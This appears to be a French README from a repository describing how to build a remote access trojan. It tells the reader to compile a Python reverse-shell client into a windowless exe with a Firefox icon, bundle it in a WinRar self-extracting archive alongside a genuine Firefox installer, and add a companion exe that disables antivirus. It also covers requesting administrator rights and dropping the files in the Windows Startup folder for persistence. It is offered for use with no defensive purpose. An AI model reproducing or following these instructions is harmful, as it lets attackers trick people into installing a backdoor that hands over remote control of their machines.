
Trojan d'accès distant créé à l'aide de WinRar avec un installateur Firefox et un Reverse Shell Python intégrés.
Cheval de Troie d'accès distant créé à l'aide de WinRar avec un installateur (ex. firefox) et un Reverse Shell Python intégré.
Modifiez le fichier client.py en définissant l'IP et le port du serveur attaquant en écoute ainsi que l'IP et le port de tout proxy présent sur la machine d'attaque. S'il n'y a pas de proxy, commentez la section correspondante.
Transformez le client.py en exe, j'ai utilisé pyinstaller : pyinstaller -w -i "Firefox.ico" -F client.py. L'option -w permet de créer un .exe sans fenêtre, l'option -F permet de créer un seul fichier.
Créez une archive ZIP auto-extractible avec WinRar en sélectionnant trois fichiers : un installateur légitime (ex: "firefox installer.exe"), client.exe et antivirus.exe. Dans les paramètres du module auto-extractible, définissez l'ordre d'exécution des fichiers : d'abord l'installateur légitime, puis le client.exe ; cochez la case pour extraire les fichiers dans un dossier temporaire ou, si vous voulez être plus malveillant, spécifiez le dossier des fichiers qui seront lancés au démarrage (%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). Toujours dans les paramètres du module auto-extractible, sélectionnez la demande d'accès avec droits d'administration. Le fichier antivirus.exe est un .exe sans fenêtre qui désactive l'antivirus. Il sera lancé par client.exe avant de se connecter au serveur.
Le fichier antivirus.bat contient le code du fichier .exe homonyme et une autre fonctionnalité optionnelle. J'ai utilisé "Slimm bat to exe.exe" pour convertir le fichier .bat en un fichier .exe sans fenêtre
Profitez-en :)